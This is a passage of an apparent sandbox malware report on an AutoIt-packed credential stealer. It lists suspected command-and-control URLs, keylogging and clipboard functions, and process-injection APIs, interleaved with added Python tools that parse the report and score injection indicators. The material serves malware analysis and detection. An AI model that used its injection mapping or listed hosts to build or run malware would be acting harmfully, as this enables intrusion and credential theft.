                Source: ROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/sk-logabpstatus.php?a=bFp4ODVzaXVsTFczSDdQcmZwbFVZRVY1RlBJVDJnQi9jS1A1dmQ1d
                Source: firefox.exe, 0000000B.00000002.2009532526.0000000027D34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://einpisalpace.shop/
                Source: YLmLMhEKNXTfg.exe, 00000008.00000002.3229916982.00000000051CF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pitaloka.xyz
                Source: YLmLMhEKNXTfg.exe, 00000008.00000002.3229916982.00000000051CF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pitaloka.xyz/iwk9/
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ROUTE.EXE, 00000007.00000003.1895708485.0000000007915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ROUTE.EXE, 00000007.00000002.3229283746.000000000423C000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.000000000372C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D44164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00D44164
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D43F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00D43F66
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00D3001C
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D5CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00D5CABC
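The three LiteSpeed and three Apache responses above are 404s returned to the sample's HTTP requests, and the "String found in binary or memory" lines mix URLs carried by the injected processes (ROUTE.EXE, YLmLMhEKNXTfg.exe) with browser search-provider strings that the stealer most likely read from profile data. The Python below is an added example, not part of the Joe Sandbox report: it parses both kinds of line, splitting the run-together response headers on known header names (the rendering dropped the CRLFs), decoding the "Data Raw" hex body, flagging dumps that are shorter than Content-Length (as the LiteSpeed dumps above are, at 1251 declared bytes), and collecting the unique hostnames from the memory strings. The sample lines are constructed, modelled on the records above with shortened bodies.

```python
"""Parse Joe Sandbox 'HTTP traffic detected' and 'String found in binary or memory'
lines into structured records. Added example; not part of the report itself."""
import re
from urllib.parse import urlsplit

# The HTML rendering dropped the CRLFs between response headers, so the only
# reliable split points are the header names themselves. Extend as needed.
KNOWN_HEADERS = (
    "Connection", "Cache-Control", "Pragma", "Content-Type", "Content-Length",
    "Date", "Server", "Strict-Transport-Security", "X-Frame-Options",
    "X-Content-Type-Options",
)
HEADER_RE = re.compile(
    "(" + "|".join(re.escape(h) for h in KNOWN_HEADERS) + "): ", re.IGNORECASE
)
# Stops at the next scheme so fused strings like "...favicon.icohttps://..." split.
URL_RE = re.compile(r"https?://(?:(?!https?://)[^\s\"'<>])+")

# Constructed sample lines modelled on the report's records; bodies shortened.
SAMPLE_LINES = [
    "Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: close"
    "cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cache"
    "content-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 22:07:42 GMTserver: LiteSpeed"
    "Data Raw: 3c 68 31 3e 34 30 34 3c 2f 68 31 3e",
    "Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:53 GMT"
    "Server: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomains"
    "X-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 18Connection: close"
    "Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e "
    "Data Ascii: <h1>Not Found</h1>",
    "Source: YLmLMhEKNXTfg.exe, 00000008.00000002.3229916982.00000000051CF000.00000040.80000000.00040000.00000000.sdmp"
    "String found in binary or memory: http://www.pitaloka.xyz/iwk9/",
    "Source: ROUTE.EXE, 00000007.00000002.3229283746.000000000423C000.00000004.10000000.00040000.00000000.sdmp"
    "String found in binary or memory: https://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp",
    "Source: ROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp"
    "String found in binary or memory: http://digi-searches.com/px.js?ch=1",
    "Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmp"
    "String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=",
]


def parse_http_line(line):
    """Turn one 'HTTP traffic detected' line into status, headers, body, truncation flag."""
    head, _, rest = line.partition("Data Raw: ")
    head = head.split("HTTP traffic detected: ", 1)[1]
    hexdump = rest.split("Data Ascii:", 1)[0]          # keep only the hex, not the ASCII echo
    status = re.match(r"HTTP/(\d\.\d) (\d{3}) ", head)
    matches = list(HEADER_RE.finditer(head, status.end()))
    reason = head[status.end():matches[0].start()] if matches else head[status.end():]
    headers = {}
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(head)
        headers[m.group(1).lower()] = head[m.end():end].strip()
    body = bytes.fromhex(hexdump)                       # fromhex ignores the spacing
    declared = int(headers.get("content-length", len(body)))
    return {
        "status": int(status.group(2)),
        "reason": reason.strip(),
        "headers": headers,
        "body": body.decode("latin-1"),
        "truncated": len(body) < declared,             # sandbox dump shorter than declared
    }


def parse_http_lines(lines):
    return [parse_http_line(l) for l in lines if "HTTP traffic detected: " in l]


def extract_hosts(lines):
    """Unique lowercase hostnames from 'String found in binary or memory' lines."""
    marker = "String found in binary or memory: "
    hosts = set()
    for line in lines:
        if marker not in line:
            continue
        for url in URL_RE.findall(line.split(marker, 1)[1]):
            host = urlsplit(url).hostname
            if host:
                hosts.add(host.lower())
    return sorted(hosts)


if __name__ == "__main__":
    for rec in parse_http_lines(SAMPLE_LINES):
        print(rec["status"], rec["headers"].get("server"),
              "truncated" if rec["truncated"] else "complete")
    print(extract_hosts(SAMPLE_LINES))
```

The hostname list still needs manual triage: ecosia.org, duckduckgo.com and search.yahoo.com strings are browser search-provider defaults and consistent with the report's browser-harvesting signatures, whereas the .xyz and .cyou paths appear only in the injected processes' memory.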

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3227680610.0000000005F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1711288888.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1716772538.00000000088D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: This is a third-party compiled AutoIt script.0_2_00CD3B3A
                Source: gH3LlhcRzg.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: gH3LlhcRzg.exe, 00000000.00000000.1372592377.0000000000D84000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_98661040-2
                Source: gH3LlhcRzg.exe, 00000000.00000000.1372592377.0000000000D84000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_29763d4d-5
                Source: gH3LlhcRzg.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8d0d1c10-0
                Source: gH3LlhcRzg.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_95cf5834-3
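The string "This is a third-party compiled AutoIt script." belongs to the AutoIt3 runtime stub and is what the report keys on for its "Binary is likely a compiled AutoIt script file" signature. The Python below is an added example, not taken from the report: it searches a binary for that marker in both ASCII and UTF-16LE (the stub's strings are wide, so a byte-wise ASCII search alone can miss it) and for the compiled-script resource header, a 16-byte magic followed by the tag "AU3!EA06", that public AutoIt unpackers locate before extracting the script. Those header bytes come from that tooling, not from this report, and are an assumption here. The sample buffer is constructed.

```python
"""Check a binary for compiled-AutoIt indicators. Added example; not from the report."""
from pathlib import Path

# Marker string from the AutoIt3 runtime stub (quoted in the report above).
MARKER = "This is a third-party compiled AutoIt script."
# Assumption: compiled-script resource header as used by public AutoIt unpackers,
# a 16-byte magic followed by the format tag. Not taken from this report.
AU3_MAGIC = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")
AU3_TAG = b"AU3!EA06"

NEEDLES = {
    "marker_ascii": MARKER.encode("ascii"),
    "marker_utf16le": MARKER.encode("utf-16-le"),
    "au3_header": AU3_MAGIC + AU3_TAG,
}


def autoit_indicators(data: bytes) -> dict:
    """Return the offset of each indicator present and an overall verdict."""
    hits = {name: off for name, needle in NEEDLES.items()
            if (off := data.find(needle)) != -1}
    return {
        "hits": hits,
        "likely_autoit": bool(hits),
        # The header offset is what an unpacker needs next, so surface it on its own.
        "script_header_offset": hits.get("au3_header"),
    }


def scan_file(path: str) -> dict:
    return autoit_indicators(Path(path).read_bytes())


def build_sample() -> bytes:
    """Constructed stand-in for an AutoIt-compiled PE: filler, wide marker, AU3 header."""
    blob = bytearray(b"MZ" + b"\x00" * 510)           # 512 bytes of fake header
    blob += MARKER.encode("utf-16-le") + b"\x00\x00"   # 92 bytes, marker at offset 512
    blob += b"\x00" * 64
    blob += AU3_MAGIC + AU3_TAG + b"\x00" * 16         # header at offset 668
    return bytes(blob)


if __name__ == "__main__":
    import sys
    result = scan_file(sys.argv[1]) if len(sys.argv) > 1 else autoit_indicators(build_sample())
    print(result)
```

Run it as `python autoit_check.py gH3LlhcRzg.exe` against a real file; with no argument it scans the constructed buffer. A hit on the header offset is the starting point for extracting and decompiling the embedded script, which is where the actual payload logic of an AutoIt-wrapped sample lives.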
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C3D3 NtClose,2_2_0042C3D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03472C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03254340 NtSetContextThread,LdrInitializeThunk,7_2_03254340
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03254650 NtSuspendThread,LdrInitializeThunk,7_2_03254650
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252B60 NtClose,LdrInitializeThunk,7_2_03252B60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03252BA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03252BE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03252BF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252AF0 NtWriteFile,LdrInitializeThunk,7_2_03252AF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252AD0 NtReadFile,LdrInitializeThunk,7_2_03252AD0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252F30 NtCreateSection,LdrInitializeThunk,7_2_03252F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252FB0 NtResumeThread,LdrInitializeThunk,7_2_03252FB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252FE0 NtCreateFile,LdrInitializeThunk,7_2_03252FE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03252E80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03252EE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03252D30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03252D10
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03252DF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252DD0 NtDelayExecution,LdrInitializeThunk,7_2_03252DD0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252C60 NtCreateKey,LdrInitializeThunk,7_2_03252C60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03252C70
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03252CA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032535C0 NtCreateMutant,LdrInitializeThunk,7_2_032535C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032539B0 NtGetContextThread,LdrInitializeThunk,7_2_032539B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252B80 NtQueryInformationFile,7_2_03252B80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252AB0 NtWaitForSingleObject,7_2_03252AB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252F60 NtCreateProcessEx,7_2_03252F60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252FA0 NtQuerySection,7_2_03252FA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252F90 NtProtectVirtualMemory,7_2_03252F90
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252E30 NtWriteVirtualMemory,7_2_03252E30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252EA0 NtAdjustPrivilegesToken,7_2_03252EA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252D00 NtSetInformationFile,7_2_03252D00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252DB0 NtEnumerateKey,7_2_03252DB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252C00 NtQueryInformationProcess,7_2_03252C00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252CF0 NtOpenProcess,7_2_03252CF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252CC0 NtQueryVirtualMemory,7_2_03252CC0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03253010 NtOpenDirectoryObject,7_2_03253010
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03253090 NtSetValueKey,7_2_03253090
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03253D10 NtOpenProcessToken,7_2_03253D10
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03253D70 NtOpenThread,7_2_03253D70
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_00748E70 NtCreateFile,7_2_00748E70
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_00748FE0 NtReadFile,7_2_00748FE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_007490E0 NtDeleteFile,7_2_007490E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_00749180 NtClose,7_2_00749180
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_007492E0 NtAllocateVirtualMemory,7_2_007492E0
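The NtCreateSection / NtMapViewOfSection / NtUnmapViewOfSection, NtAllocateVirtualMemory / NtWriteVirtualMemory / NtProtectVirtualMemory, NtQueueApcThread and NtSuspendThread / NtGetContextThread / NtSetContextThread / NtResumeThread stubs listed for svchost.exe and ROUTE.EXE are the native primitives behind the report's "Maps a DLL or memory area into another process", "Writes to foreign memory regions", "Queues an APC in another process" and "Modifies the context of a thread in another process" signatures. A listed stub shows capability, not that the call was made; the behavioural signatures are what confirm use. The Python below is an added example rather than anything from the report: it parses "Code function" lines into per-process API sets and names which injection chains are fully present. The grouping of APIs into techniques is this example's own, and the sample lines are copied from the listing above.

```python
"""Score Joe Sandbox 'Code function' listings for process-injection primitives.
Added example; not part of the report."""
import re
from collections import defaultdict

# Native API groups behind the report's injection signatures. The names are the
# ntdll exports listed above; the grouping is this example's own interpretation.
TECHNIQUES = {
    "write to foreign memory": {
        "NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory"},
    "section mapping into another process": {
        "NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"},
    "APC queueing": {"NtQueueApcThread", "NtResumeThread"},
    "thread context hijack": {
        "NtSuspendThread", "NtGetContextThread", "NtSetContextThread", "NtResumeThread"},
}

# "<path>Code function: <proc>_<run>_<addr> API,API,...,<proc>_<run>_<addr>"
LINE_RE = re.compile(
    r"Source: (?P<path>.+?)Code function: "
    r"(?P<proc>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]+)"
    r"(?: (?P<apis>.*?))?(?P=proc)_(?P=run)_(?P=addr)$"
)

# Sample lines copied from the report listing above.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0",
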